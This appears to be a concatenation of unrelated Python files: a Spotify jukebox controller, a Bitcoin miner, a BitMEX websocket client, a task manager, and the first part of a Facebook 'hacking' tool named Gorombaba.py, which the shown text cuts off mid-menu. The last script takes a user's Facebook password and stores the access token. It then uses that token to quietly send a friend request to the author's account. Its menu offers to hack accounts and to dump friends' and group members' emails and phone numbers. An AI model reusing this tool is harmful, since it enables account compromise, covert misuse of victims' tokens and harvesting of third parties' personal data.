"""Randomize, i.e. shuffle. Update internal shuffle tracking variable."""
if self._shuffle_status == True:
self.sp.shuffle(state=False, device_id=self.device_id)
self._shuffle_status = False
else:
self.sp.shuffle(state=True, device_id=self.device_id)
self._shuffle_status = True
logging.info(
f"Shuffle Triggered in {self.current_state}. "
+ f"Now shuffle is set to {self._shuffle_status}."
)
def _reverse(self):
"""Skip back a track and start playing if not currently playing."""
if self._active_device() == True:
logging.debug(f"Rewinding Track, current state {self.current_state}")
if self.current_state == self.playing:
self.sp.previous_track(device_id=self.device_id)
else:
self._resume()
self.sp.previous_track(device_id=self.device_id)
self.current_state = self.playing
else:
pass
def _forward(self):
"""Skip forward a track and start playing if not currently playing."""
if self._active_device() == True:
logging.debug(
f"Skipping Forward a Track, current state {self.current_state}"
)
if self.current_state == self.playing:
self.sp.next_track(device_id=self.device_id)
else:
self._resume()
self.sp.next_track(device_id=self.device_id)
self.current_state = self.playing
else:
pass
def _resume(self) -> None:
"""Resumes playing current track."""
if self._active_device() == True:
self.sp.start_playback(device_id=self.device_id)
self.current_state = self.playing
def _stop(self) -> None:
"""Stops playing current track, moves to stopped state."""
if self._active_device() == True:
self.sp.pause_playback(device_id=self.device_id)
self.current_state = self.stopped
def _play(self, uri: str) -> None:
"""Starts playback of uri on jukebox."""
if "spotify:track:" in uri:
self.sp.start_playback(device_id=self.device_id, uris=[uri])
self.current_state = self.playing
else:
self.sp.start_playback(device_id=self.device_id, context_uri=uri)
self.current_state = self.playing
def _pause(self) -> None:
"""Pauses playback on jukebox."""
if self._active_device() == True:
self.sp.pause_playback(device_id=self.device_id)
self.current_state = self.paused
def _active_device(self):
"""Returns True if self.device_id (jukebox) matches the active device_id."""
devices_dict = self.sp.devices()
for device in devices_dict.get("devices"):
if device.get("is_active") == True and device.get("id") == self.device_id:
return True
return False
    def _load_records(self) -> dict:
        """Load records.json into a python dict."""
        with open("./records.json", "r") as records_json:
            records = json.load(records_json)
        logging.info("Loaded records.json")
        return records
@staticmethod
def _mapping_dict() -> Dict[str, str]:
decode_dict = {
"_create_stopped": "stopped",
"_create_playing": "playing",
"_create_paused": "paused",
}
return decode_dict
@staticmethod
def _command_options() -> list:
options = ["stop", "play/pause", "forward", "reverse", "randomize"]
return options
def __repr__(self) -> str:
decode_dict = self._mapping_dict()
return str(decode_dict.get(self.current_state.__name__))
@prime
def _create_stopped(self) -> Generator:
while True:
command: str = yield
if command[0].lower() == "play/pause":
if command[1] != "":
# actually call the function to play the song
self._play(command[1])
else:
# Pressing play/pause while stopped does nothing
pass
elif command[0].lower() == "stop":
pass
elif command[0].lower() == "forward":
# Skipping Forward while stopped does nothing
pass
elif command[0].lower() == "reverse":
# Skipping Forward while stopped does nothing
pass
elif command[0].lower() == "randomize":
# toggles shuffling status, stays paused
self._shuffle()
else:
raise IncorrectCommand(command)
@prime
def _create_playing(self) -> Generator:
while True:
command: str = yield
if command[0].lower() == "play/pause":
if command[1] != "":
# actually call the function to play the song
self._play(command[1])
else:
# Pressing play/pause while playing pauses
self._pause()
elif command[0].lower() == "stop":
self._stop()
elif command[0].lower() == "forward":
# Skipping Forward skips to next track
self._forward()
elif command[0].lower() == "reverse":
# Skipping Reverse skips back to previous track
self._reverse()
elif command[0].lower() == "randomize":
# toggles shuffling status, stays paused
self._shuffle()
else:
raise IncorrectCommand(command)
@prime
def _create_paused(self) -> Generator:
while True:
command: str = yield
if command[0].lower() == "play/pause":
if command[1] != "":
# actually call the function to play the song
self._play(command[1])
elif self._active_device() == True:
# Pressing play while paused resumes the song if this device is being used
self._resume()
elif command[0].lower() == "stop":
self._stop()
elif command[0].lower() == "forward":
# Skipping Forward while paused starts playback and skips to next track
self._forward()
elif command[0].lower() == "reverse":
# Skipping Reverse while paused starts playback and skips back to previous track
self._reverse()
elif command[0].lower() == "randomize":
# toggles shuffling status, stays paused
self._shuffle()
else:
raise IncorrectCommand(command)
class IncorrectCommand(Exception):
def __init__(self, command):
self.command = command
logging.debug(f'"{self.command}" is invalid input')
def __str__(self):
return f'"{self.command}" is invalid input'
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
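# Note on the helpers above (added comment): 'getwork' returns hex strings whose 32-bit
# words are stored in the byte order used by the reference client. bytereverse() swaps the
# bytes within one 32-bit word, bufreverse() applies that to every word of a buffer, and
# wordreverse() reverses the word order, so the final SHA-256d digest can be compared with
# the target as a single big-endian 256-bit integer. On a little-endian machine, e.g.:
#   bytereverse(0x12345678) == 0x78563412
#   bufreverse('\x12\x34\x56\x78') == '\x78\x56\x34\x12'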
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9999
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
bitmex_websocket.py
|
# coding: UTF-8
import hashlib
import hmac
import json
import os
import threading
import time
import traceback
import urllib
import websocket
from datetime import datetime
from src import logger, to_data_frame, notify
from src.config import config as conf
def generate_nonce():
return int(round(time.time() * 1000))
def generate_signature(secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
# Parse the url so we can remove the base and extract just the path.
parsedURL = urllib.parse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = (verb + path + str(nonce) + data).encode('utf-8')
signature = hmac.new(secret.encode('utf-8'), message, digestmod=hashlib.sha256).hexdigest()
return signature
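# Example of the message that gets signed for the realtime endpoint (illustrative values):
#   verb='GET', url='/realtime', nonce=1577836800000, data=''
#   message   = 'GET/realtime1577836800000'
#   signature = HMAC_SHA256(api_secret, message).hexdigest()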
class BitMexWs:
# Account
account = ''
# Pair
pair = 'XBTUSD'
# testnet
testnet = False
    # Flag indicating whether the websocket should keep running.
    is_running = True
    # Registered event handlers, keyed by table/event name.
    handlers = {}
def __init__(self, account, pair, test=False):
"""
constructor
"""
self.account = account
self.pair = pair
self.testnet = test
if test:
domain = 'testnet.bitmex.com'
else:
domain = 'www.bitmex.com'
self.endpoint = 'wss://' + domain + '/realtime?subscribe=tradeBin1m:' + self.pair + ',' \
'tradeBin5m:' + self.pair + ',tradeBin1h:' + self.pair + ',tradeBin1d:' + self.pair + ',instrument:' + self.pair + ',' \
'margin,position:' + self.pair + ',wallet,orderBookL2:' + self.pair
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def __get_auth(self):
"""
get auth info
"""
api_key = conf['bitmex_test_keys'][self.account]['API_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['API_KEY']
api_secret = conf['bitmex_test_keys'][self.account]['SECRET_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['SECRET_KEY']
        if len(api_key) > 0 and len(api_secret) > 0:
nonce = generate_nonce()
return [
"api-nonce: " + str(nonce),
"api-signature: " + generate_signature(api_secret, 'GET', '/realtime', nonce, ''),
"api-key:" + api_key
]
else:
logger.info("WebSocket is not authenticating.")
return []
def __start(self):
"""
start the websocket.
"""
while self.is_running:
self.ws.run_forever()
def __on_error(self, ws, message):
"""
On Error listener
:param ws:
:param message:
"""
logger.error(message)
logger.error(traceback.format_exc())
notify(f"Error occurred. {message}")
notify(traceback.format_exc())
def __on_message(self, ws, message):
"""
On Message listener
:param ws:
:param message:
:return:
"""
try:
obj = json.loads(message)
if 'table' in obj:
if len(obj['data']) <= 0:
return
table = obj['table']
action = obj['action']
data = obj['data']
if table.startswith("tradeBin"):
data[0]['timestamp'] = datetime.strptime(data[0]['timestamp'][:-5], '%Y-%m-%dT%H:%M:%S')
self.__emit(table, action, to_data_frame([data[0]]))
elif table.startswith("instrument"):
self.__emit(table, action, data[0])
elif table.startswith("margin"):
self.__emit(table, action, data[0])
elif table.startswith("position"):
self.__emit(table, action, data[0])
elif table.startswith("wallet"):
self.__emit(table, action, data[0])
elif table.startswith("orderBookL2"):
self.__emit(table, action, data)
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
def __emit(self, key, action, value):
"""
send data
"""
if key in self.handlers:
self.handlers[key](action, value)
def __on_close(self, ws):
"""
On Close Listener
:param ws:
"""
if 'close' in self.handlers:
self.handlers['close']()
if self.is_running:
logger.info("Websocket restart")
notify(f"Websocket restart")
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def on_close(self, func):
"""
on close fn
:param func:
"""
self.handlers['close'] = func
def bind(self, key, func):
"""
bind fn
:param key:
:param func:
"""
if key == '1m':
self.handlers['tradeBin1m'] = func
if key == '5m':
self.handlers['tradeBin5m'] = func
if key == '1h':
self.handlers['tradeBin1h'] = func
if key == '1d':
self.handlers['tradeBin1d'] = func
if key == 'instrument':
self.handlers['instrument'] = func
if key == 'margin':
self.handlers['margin'] = func
if key == 'position':
self.handlers['position'] = func
if key == 'wallet':
self.handlers['wallet'] = func
if key == 'orderBookL2':
self.handlers['orderBookL2'] = func
def close(self):
"""
close websocket
"""
self.is_running = False
self.ws.close()
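# Minimal usage sketch (added for illustration; account name below is hypothetical).
# It assumes the corresponding keys exist in src.config (bitmex_keys / bitmex_test_keys):
#
#   ws = BitMexWs(account='my_account', pair='XBTUSD', test=True)
#   ws.bind('1m', lambda action, df: logger.info(df))        # 1-minute candles as a DataFrame
#   ws.bind('wallet', lambda action, data: logger.info(data))
#   ...
#   ws.close()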
|
pyTaskManager.py
|
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (C) 2017 hidenorly
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread, Lock
import time
# TaskManager and Task definitions
class PyTask(object):
description = ""
taskCompleCallback = None
running = False
mStopRunning = False
_thread = None
def __init__(self, description = ""):
self.description = description
self.running = False
self._taskManager = None
self._taskCompleCallback = None
self.mStopRunning = False
self._thread = None
def execute(self, args):
self.mStopRunning = False
self.running = True
self.onExecute()
self._doneTask()
self.running = False
self.mStopRunning = False
def onExecute(self):
# override me
for i in range(50):
time.sleep(0.1)
if True == self.mStopRunning:
break
def cancel(self):
if self.running:
self.mStopRunning = True
def finalize(self):
self.running = False
def _doneTask(self):
if( (None!=self._taskCompleCallback) and (None!=self._taskManager) ):
self._taskCompleCallback(self)
class PyTaskManager:
def __init__(self, numOfThread = 4):
self.tasks = []
self.numOfThread = numOfThread
self.threads = []
self.mutexTasks = Lock()
self.mutexThreads = Lock()
self._stoppingTask = False
def addTask(self, aTask):
aTask._taskManager = self
aTask._taskCompleCallback = self._onTaskCompletion
self.mutexTasks.acquire()
try:
self.tasks.append( aTask )
finally:
self.mutexTasks.release()
def cancelTask(self, aTask):
self.mutexTasks.acquire()
self.mutexThreads.acquire()
try:
if aTask.running:
aTask.cancel()
self.tasks.remove(aTask)
_t = None
for t in self.threads:
if t == aTask._thread:
_t = t
if( None!=_t ):
self.threads.remove(_t)
finally:
self.mutexThreads.release()
self.mutexTasks.release()
def executeAll(self):
self._stoppingTask = False
self.mutexTasks.acquire()
self.mutexThreads.acquire()
try:
for aTask in self.tasks:
if( (False == aTask.running) and (len(self.threads) < self.numOfThread) ):
t = Thread(target = aTask.execute, args = (aTask,))
if(t!=None):
self.threads.append(t)
aTask.running = True
aTask._thread = t
t.start()
finally:
self.mutexThreads.release()
self.mutexTasks.release()
def isRunning(self):
result = False
self.mutexThreads.acquire()
try:
if len(self.threads) > 0:
result = True
finally:
self.mutexThreads.release()
return result
def isRemainingTasks(self):
result = False
self.mutexTasks.acquire()
try:
if len(self.tasks) > 0:
result = True
finally:
self.mutexTasks.release()
return result
def _onTaskCompletion(self, aTask):
self.cancelTask( aTask )
if self._stoppingTask == False:
self.executeAll()
def stopAll(self):
self._stoppingTask = True
while( self.isRunning() ):
self.mutexTasks.acquire()
try:
for aTask in self.tasks:
if aTask.running:
aTask.cancel()
finally:
self.mutexTasks.release()
time.sleep(0.1)
def finalize(self):
while( self.isRemainingTasks() or self.isRunning() ):
if ( self.isRunning() ):
time.sleep(0.1)
else:
break
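# Minimal usage sketch (added for illustration); it relies only on the classes above.
if __name__ == '__main__':
    class SleepTask(PyTask):
        def onExecute(self):
            # Pretend to do ~1 second of cancellable work
            for _ in range(10):
                time.sleep(0.1)
                if self.mStopRunning:
                    break

    manager = PyTaskManager(numOfThread=2)
    for i in range(4):
        manager.addTask(SleepTask("task-%d" % i))
    manager.executeAll()
    manager.finalize()
    print("all tasks finished")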
|
Gorombaba.py
|
# coding=utf-8
#coding_by_Azhar_Baloch
#Sahu-Zada
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
🔷💓💓🔷
_____ _ ____ _ ____ ____
/__ __\/ \ /|/ _ \/ \ /|/ _ \/ _ \
/ \ | |_||| / \|| |\ ||| | \|| / \|
| | | | ||| |-||| | \||| |_/|| |-||
\_/ \_/ \|\_/ \|\_/ \|\____/\_/ \|
____ ____
| _ \ /\ | _ \ /\
| |_) | / \ | |_) | / \
| _ < / /\ \ | _ < / /\ \
| |_) / ____ \| |_) / ____ \
|____/_/ \_\____/_/ \_\
""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Login"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Login using token"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Exit"
print "\033[1;97m║"
msuk = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;91m[☆] \033[1;92mLOGIN WITH FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;91m[+] \033[1;36mPassword \033[1;91m:\033[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
os.system('xdg-open https://www.facebook.com/Thanda.babaa')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
os.system('xdg-open https://www.facebook.com/Thanda.babaa')
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
#### MENU ####
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "\033[1;92m 🔷AKASH TOOLS🔷"
print
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m User information"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Get Id/email/hp"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Hack facebook account "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Bot "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Others "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m6.\033[1;97m Show token "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m7.\033[1;97m Update "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m8.\033[1;97m Delete trash "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m9.\033[1;97m LogOut "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.system('reset')
print logo
print 40 * '\033[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\033[1;91m[ \033[1;97mBack \033[1;91m]')
menu()
elif zedd =="8":
os.remove('out')
elif zedd =="9":
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/Thanda.babaa')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[AKASH] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[AKASH] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[AKASH] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Get group member ID"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Get group member email"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Get group member phone number"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m6.\033[1;97m Get email friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m8.\033[1;97m Get a friend's phone number"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
